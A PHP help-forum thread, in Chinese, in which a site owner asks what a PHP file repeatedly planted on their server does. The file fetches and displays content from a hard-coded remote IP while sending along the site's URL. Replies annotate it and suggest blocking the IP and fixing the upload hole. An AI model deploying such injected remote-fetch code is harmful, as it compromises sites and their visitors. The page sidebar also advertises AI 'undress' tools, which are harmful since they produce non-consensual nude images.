목차
回复讨论(解决方案)
백엔드 개발 PHP 튜토리얼 PHP代码 请高手帮忙看下什么意思

PHP代码 请高手帮忙看下什么意思

Jun 20, 2016 pm 12:29 PM

我网站好像被黑了,总有个SB天天来我网站根目录放一个文件,打开后代码如下:
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/"; 
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT']; 
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit(); 
function getHTTPPage($url) {
$opts = array(
  'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
  )
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;

?>

这什么意图?求高手分析下


回复讨论(解决方案)

他把这个代码放到你根目录下,网站是不是访问不了?

好像是他把你网站 原始地址   传到他自己写的一个方法里面 用 host 参数接受   然后抓取你首页的信息吧 

我网站没异常(我还没发现异常)

好像是他把你网站 原始地址   传到他自己写的一个方法里面 用 host 参数接受   然后抓取你首页的信息吧 



我网站没异常(我还没发现异常)

上面我的描述有问题,这个文件不是放在更目录,是放在根目录的上一个目录,如图:

public_html 这个目录里面是网站的根目录,他这个文件和public_html放在同一个目录,不知道他这样对我的网站有什么影响。 这SB隔天来次,已经删了几次了。
linux系统,目前权限设置为755,设置为644网站就打不开了,有什么办法不让他上次文件吗?

$Remote_server."/index.html?host=".$host_name  这个地方他把你的网站地址传过去 不知道干什么了 ,代码在那个ip的服务器上面 看不到。。。。。猜不来他要干什么。。。。。

服务器 那方面的我不懂,等高手来把,


谢谢你

没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
  'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
  )
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;


至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击)
仅是出一点广告,倒是也无所谓

不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。

把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。

没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
  'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
  )
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;


至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击)
仅是出一点广告,倒是也无所谓


-------------------------
感谢

不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。


-------------------------
感谢

把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。



-------------------------
感谢

我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹

我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹



谢谢  有可能
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

11 최고의 PHP URL 쇼트너 스크립트 (무료 및 프리미엄) 11 최고의 PHP URL 쇼트너 스크립트 (무료 및 프리미엄) Mar 03, 2025 am 10:49 AM

종종 키워드와 추적 매개 변수로 혼란스러워하는 긴 URL은 방문자를 방해 할 수 있습니다. URL 단축 스크립트는 솔루션을 제공하여 소셜 미디어 및 기타 플랫폼에 이상적인 간결한 링크를 만듭니다. 이 스크립트는 개별 웹 사이트 a에 유용합니다

Laravel의 플래시 세션 데이터로 작업합니다 Laravel의 플래시 세션 데이터로 작업합니다 Mar 12, 2025 pm 05:08 PM

Laravel은 직관적 인 플래시 방법을 사용하여 임시 세션 데이터 처리를 단순화합니다. 응용 프로그램에 간단한 메시지, 경고 또는 알림을 표시하는 데 적합합니다. 데이터는 기본적으로 후속 요청에만 지속됩니다. $ 요청-

Laravel Back End : Part 2, React가있는 React 앱 구축 Laravel Back End : Part 2, React가있는 React 앱 구축 Mar 04, 2025 am 09:33 AM

이것은 Laravel 백엔드가있는 React Application을 구축하는 데있어 시리즈의 두 번째이자 마지막 부분입니다. 이 시리즈의 첫 번째 부분에서는 기본 제품 목록 응용 프로그램을 위해 Laravel을 사용하여 편안한 API를 만들었습니다. 이 튜토리얼에서는 Dev가 될 것입니다

Laravel 테스트에서 단순화 된 HTTP 응답 조롱 Laravel 테스트에서 단순화 된 HTTP 응답 조롱 Mar 12, 2025 pm 05:09 PM

Laravel은 간결한 HTTP 응답 시뮬레이션 구문을 제공하여 HTTP 상호 작용 테스트를 단순화합니다. 이 접근법은 테스트 시뮬레이션을보다 직관적으로 만들면서 코드 중복성을 크게 줄입니다. 기본 구현은 다양한 응답 유형 단축키를 제공합니다. Illuminate \ support \ Facades \ http를 사용하십시오. http :: 가짜 ([ 'google.com'=> ​​'Hello World', 'github.com'=> ​​[ 'foo'=> 'bar'], 'forge.laravel.com'=>

PHP의 컬 : REST API에서 PHP Curl Extension 사용 방법 PHP의 컬 : REST API에서 PHP Curl Extension 사용 방법 Mar 14, 2025 am 11:42 AM

PHP 클라이언트 URL (CURL) 확장자는 개발자를위한 강력한 도구이며 원격 서버 및 REST API와의 원활한 상호 작용을 가능하게합니다. PHP CURL은 존경받는 다중 프로모토콜 파일 전송 라이브러리 인 Libcurl을 활용하여 효율적인 execu를 용이하게합니다.

Codecanyon에서 12 개의 최고의 PHP 채팅 스크립트 Codecanyon에서 12 개의 최고의 PHP 채팅 스크립트 Mar 13, 2025 pm 12:08 PM

고객의 가장 긴급한 문제에 실시간 인스턴트 솔루션을 제공하고 싶습니까? 라이브 채팅을 통해 고객과 실시간 대화를 나누고 문제를 즉시 해결할 수 있습니다. 그것은 당신이 당신의 관습에 더 빠른 서비스를 제공 할 수 있도록합니다.

2025 PHP 상황 조사 발표 2025 PHP 상황 조사 발표 Mar 03, 2025 pm 04:20 PM

2025 PHP Landscape Survey는 현재 PHP 개발 동향을 조사합니다. 개발자와 비즈니스에 대한 통찰력을 제공하는 프레임 워크 사용, 배포 방법 및 과제를 탐색합니다. 이 조사는 현대 PHP Versio의 성장을 예상합니다

라 라벨에서 알림 라 라벨에서 알림 Mar 04, 2025 am 09:22 AM

이 기사에서는 Laravel 웹 프레임 워크에서 알림 시스템을 탐색 할 것입니다. Laravel의 알림 시스템을 사용하면 다른 채널을 통해 사용자에게 알림을 보낼 수 있습니다. 오늘은 알림을 보낼 수있는 방법에 대해 논의합니다

See all articles